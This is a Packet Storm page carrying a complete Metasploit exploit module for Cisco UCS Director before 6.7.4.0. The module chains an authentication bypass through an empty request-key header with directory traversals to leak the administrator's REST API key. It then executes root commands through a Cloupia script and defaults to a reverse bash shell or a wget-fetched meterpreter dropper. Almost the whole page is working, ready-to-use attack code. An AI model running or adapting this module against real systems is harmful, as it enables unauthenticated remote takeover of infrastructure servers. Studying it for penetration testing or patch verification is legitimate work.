what you don't know can hurt you

Cisco UCS Director Cloupia Script Remote Code Execution

Cisco UCS Director Cloupia Script Remote Code Execution
Posted Jun 5, 2020
Authored by mr_me, wvu | Site metasploit.com

This Metasploit module exploits an authentication bypass and directory traversals in Cisco UCS Director versions prior to 6.7.4.0 to leak the administrator's REST API key and execute a Cloupia script containing an arbitrary root command. Note that the primary functionality of this module is to leverage the Cloupia script interpreter to execute code. This functionality is part of the application's intended operation and considered a "foreverday." The authentication bypass and directory traversals only get us there. If you already have an API key, you may set it in the API_KEY option. The LEAK_FILE option may be set if you wish to leak the API key from a different absolute path, but normally this isn't advisable. Tested on Cisco's VMware distribution of 6.7.3.0.

tags | exploit, arbitrary, root
systems | cisco
advisories | CVE-2020-3243, CVE-2020-3250
MD5 | a3283617421910d08a845659be600c53

Cisco UCS Director Cloupia Script Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Cisco UCS Director Cloupia Script RCE',
'Description' => %q{
This module exploits an authentication bypass and directory traversals
in Cisco UCS Director < 6.7.4.0 to leak the administrator's REST API
key and execute a Cloupia script containing an arbitrary root command.

Note that the primary functionality of this module is to leverage the
Cloupia script interpreter to execute code. This functionality is part
of the application's intended operation and considered a "foreverday."
The authentication bypass and directory traversals only get us there.

If you already have an API key, you may set it in the API_KEY option.
The LEAK_FILE option may be set if you wish to leak the API key from a
different absolute path, but normally this isn't advisable.

Tested on Cisco's VMware distribution of 6.7.3.0.
},
'Author' => [
'mr_me', # Discovery and exploit
'wvu' # Module
],
'References' => [
['CVE', '2020-3243'], # X-Cloupia-Request-Key auth bypass
['CVE', '2020-3250'], # Directory traversal #2 (userAPIDownloadFile)
['ZDI', '20-540'], # X-Cloupia-Request-Key auth bypass
['ZDI', '20-538'], # Directory traversal #2 (userAPIDownloadFile)
['URL', 'https://srcincite.io/blog/2020/04/17/strike-three-symlinking-your-way-to-unauthenticated-access-against-cisco-ucs-director.html'],
['URL', 'https://srcincite.io/pocs/src-2020-0014.py.txt']
],
'DisclosureDate' => '2020-04-15', # Vendor advisory
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
[
'Unix Command',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_command,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
],
[
'Linux Dropper',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => 'wget',
'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
}
]
],
'DefaultTarget' => 1,
'DefaultOptions' => {
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options([
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('API_KEY', [false, 'API key if you have it']),
OptString.new(
'LEAK_FILE',
[
true,
'Leak API key from this file (absolute path)',
'/opt/infra/idaccessmgr/logfile.txt'
]
)
])

# XXX: https://github.com/rapid7/metasploit-framework/issues/12963
import_target_defaults
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/app/ui/login.jsp')
)

unless res
return CheckCode::Unknown('Target did not respond to check request.')
end

unless res.code == 200 && res.body.include?('Cisco UCS Director')
return CheckCode::Unknown('Target is not running Cisco UCS Director.')
end

CheckCode::Detected('Target is running Cisco UCS Director.')
end

def exploit
unless datastore['LEAK_FILE'].start_with?('/')
fail_with(Failure::BadConfig, 'LEAK_FILE is not an absolute path')
end

# NOTE: Automatic check is implemented by the AutoCheck mixin
super

# Randomly named file is never written to the exports directory
create_exports_dir(
'/opt/infra/web_cloudmgr/apache-tomcat/webapps/app/cloudmgr/exports',
rand_text_alphanumeric(8..42)
)

if (@api_key = datastore['API_KEY'])
print_status("User-specified API key: #{@api_key}")
else
leak_api_key(datastore['LEAK_FILE'])
end

print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

case target['Type']
when :unix_command
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end

def create_exports_dir(*path_parts)
path = normalize_uri(path_parts)

mime = Rex::MIME::Message.new
mime.add_part(
Faker::Hacker.say_something_smart, # data
'text/plain', # content_type
nil, # transfer_encoding
%(form-data; name="#{rand_text_alphanumeric(8..42)}"; ) +
# Directory traversal #1:
# /opt/infra/uploads/ApiUploads/../../../../foo/bar -> /foo/bar
%(filename="../../../..#{path}") # content_disposition
)

print_status('Creating exports directory')

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/cloupia/api/rest'),
'headers' => {
'X-Cloupia-Request-Key' => '' # Auth bypass
},
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'vars_get' => {
'opName' => 'userAPI:userAPIUnifiedImport',
'opData' => '{}'
},
'data' => mime.to_s
)

unless res
fail_with(Failure::Unknown, "Target did not respond to #{__method__}")
end

# It will always return 200, even on error
unless res.code == 200
fail_with(Failure::UnexpectedReply, "Target returned #{res.code} code")
end

# It will always return this error, despite creating the directory!
unless res.body.include?('Cannot execute operation')
fail_with(Failure::NotVulnerable, 'Could not create exports directory')
end

print_good('Successfully created exports directory')
end

def leak_api_key(*path_parts)
path = normalize_uri(path_parts)

print_status("Leaking API key from #{path}")

# TODO: Chunk this!
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/cloupia/api/rest'),
'headers' => {
'X-Cloupia-Request-Key' => '' # Auth bypass
},
'vars_get' => {
'opName' => 'userAPI:userAPIDownloadFile',
'opData' => {
# Directory traversal #2:
# /opt/infra/web_cloudmgr/apache-tomcat/webapps/app/cloudmgr/exports/../../../../../../../../foo/bar -> /foo/bar
'param0' => "../../../../../../../..#{path}"
}.to_json
},
'partial' => true
)

unless res
fail_with(Failure::Unknown, "Target did not respond to #{__method__}")
end

# It will always return 200, even on error
unless res.code == 200
fail_with(Failure::UnexpectedReply, "Target returned #{res.code} code")
end

# There is no spoon
if res.body.include?('There is no file with the name')
fail_with(Failure::NotFound, "#{path} does not exist")
end

# An empty body may indicate permission denied
if res.body.empty?
fail_with(Failure::UnexpectedReply, "#{path} is empty or unreadable")
end

vprint_good("Successfully dumped #{path}")

@api_key =
res.body.scan(/"loginName":"admin".+"restKey":"(\h+)"/).flatten.first

unless @api_key
fail_with(Failure::NoAccess, 'Could not find API key')
end

print_good("Found API key: #{@api_key}")
end

def execute_command(cmd, _opts = {})
vprint_status("Executing command: #{cmd}")

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/cloupia/api-v2/generalActions'),
'headers' => {
'X-Cloupia-Request-Key' => @api_key
},
'ctype' => 'text/xml',
'data' => cloupia_script(cmd)
)

unless res
fail_with(Failure::Unknown, "Target did not respond to #{__method__}")
end

# It will always return 200, even on error
unless res.code == 200
fail_with(Failure::UnexpectedReply, "Target returned #{res.code} code")
end

# Just like Unix, a status of 0 indicates success
unless res.body.include?('<operationStatus>0</operationStatus')
fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
end

print_good("Successfully executed command: #{cmd}")
end

def cloupia_script(cmd)
# https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html
script = <<~JAVA.tr("\n", '')
new java.lang.ProcessBuilder(
"bash",
"-c",
new java.lang.String(
java.util.Base64.getDecoder().decode(
"#{Rex::Text.encode_base64(cmd)}"
)
)
).start();
JAVA

<<~XML
<?xml version="1.0" encoding="UTF-8"?>
<cuicOperationRequest>
<operationType>EXECUTE_CLOUPIA_SCRIPT</operationType>
<payload>
<![CDATA[
<ExecuteCloupiaScript>
<label>#{rand_text_alphanumeric(8..42)}</label>
<script>#{script.encode(xml: :text)}</script>
</ExecuteCloupiaScript>
]]>
</payload>
</cuicOperationRequest>
XML
end

end
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    11 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close